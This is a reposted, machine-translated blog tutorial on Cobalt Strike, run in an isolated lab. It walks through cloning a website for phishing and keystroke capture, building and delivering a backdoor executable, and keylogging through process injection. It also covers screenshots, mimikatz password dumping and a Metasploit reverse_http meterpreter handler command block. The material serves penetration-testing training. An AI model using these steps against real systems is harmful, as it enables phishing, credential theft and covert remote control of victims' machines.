当前位置:网站首页>Introduction to the "penetration foundation" cobalt strike Foundation_ Cobalt strike linkage msfconsole

Introduction to the "penetration foundation" cobalt strike Foundation_ Cobalt strike linkage msfconsole

2022-06-24 04:43:00 Ho1aAs

This experiment runs in a safe and isolated environment
For teaching purposes only

Environmental Science

  • kali:Cobalt Strike4.3,192.168.225.129
  • winxp:192.168.225.130

To configure cs

start-up cs The server

First of all cs Folder permissions

chmod -R 777 ./cobaltstrike4.3  

start-up cs The server ,teamserver ip password, Custom password ,ip Fill in the public network / LAN , Can't fill in 127.0.0.1

 Insert picture description here
Default port 50050

Log in to the client

sh ./start.sh

Here, the client is directly opened on the server , So you can fill in 127.0.0.1, It is better to fill in the LAN IP

 Insert picture description here

Web phishing

Select clone site

 Insert picture description here
Clone the target website as phishing , Check the record keyboard

 Insert picture description here
The target machine accesses and enters text

 Insert picture description here
The input content can be intercepted

 Insert picture description here

Target penetration

establish Listener

First create a listener

 Insert picture description here
add One http Monitor ,host Select client ip

Beacon For built-in Listener, obtain shell To CS On ,Foreign For external combination Listener, Commonly used in MSF The combination of

 Insert picture description here
Create success

 Insert picture description here

Create a back door

attack package There are four kinds.

 Insert picture description here

  1. hta
  2. office macro
  3. Customize payload
  4. exe

Demonstrate options exe, Configure the corresponding listener , Then create 32 Bit exe

 Insert picture description here
Save it to the desktop

 Insert picture description here

If it is hta, function mshta URL that will do

The target is on line

This step simulates the victim downloading malicious exe

*python File server

Run on the desktop

python3 -m http.server 8010

 Insert picture description here
Target access , Click on the run

 Insert picture description here
Can trigger cs go online

cs Built in file server

Make it convenient , Select file server phishing

 Insert picture description here

Select the generated back door , Then change a name
 Insert picture description here
Target access url, Click on the run

 Insert picture description here
Trigger cs go online

 Insert picture description here

modify sleep Time

Default 60 The second target notifies the server of the survival status , To hide yourself , And get the command to be executed once , It is necessary to shorten this time to perform penetration in order to get a good echo

 Insert picture description here
Just make it smaller , Demo changed to 1s

 Insert picture description here

Read directory

 Insert picture description here

 Insert picture description here

Process injection records keyboard input

The target opens a browser

 Insert picture description here
cs Browse process

 Insert picture description here
Inject explore.exe, And click the log ketstrokes Recording keyboard

 Insert picture description here

After successful injection, a new process will be launched , It's the same as above Don't forget to put sleep The small

 Insert picture description here

The target enters characters in the browser ,cs The keylog window receives the input character

 Insert picture description here

Screenshot

 Insert picture description here
Open the screenshot window to see

 Insert picture description here

mimikatz Get password

 Insert picture description here

Cobalt Strike linkage msfconsole

First of all to ensure cs go online

 Insert picture description here
Create a foreign http Monitor ,ip Fill in the public network / LAN , Make an uncommon port

 Insert picture description here
then cs The client starts msf, here ip You can fill in 127

msfconsole
use exploit/multi/handler
set lhost 127.0.0.1
set lport 5555
set payload windows/meterpreter/reverse_http
exploit

It is equivalent to that the request of the target plane is sent to msf

 Insert picture description here

Configure target generation request

 Insert picture description here
choice msf The monitor for

 Insert picture description here
Just a minute

 Insert picture description here

Plug in installation

Use the plug-in of Tao , After decompressing load cna file
 Insert picture description here
Mail can be sent to the online machine

 Insert picture description here

Reference resources

https://www.freebuf.com/company-information/167460.html
https://github.com/DeEpinGh0st/Erebus
https://github.com/pandasec888/taowu-cobalt-strike

End

Welcome to follow me CSDN Blog :@Ho1aAs
Copyright belongs to :Ho1aAs
Link to this article :https://blog.csdn.net/Xxy605/article/details/125388547
Copyright notice : This article is original , When reprinted, please indicate the source and this statement

原网站

版权声明
本文为[Ho1aAs]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/175/202206240000203099.html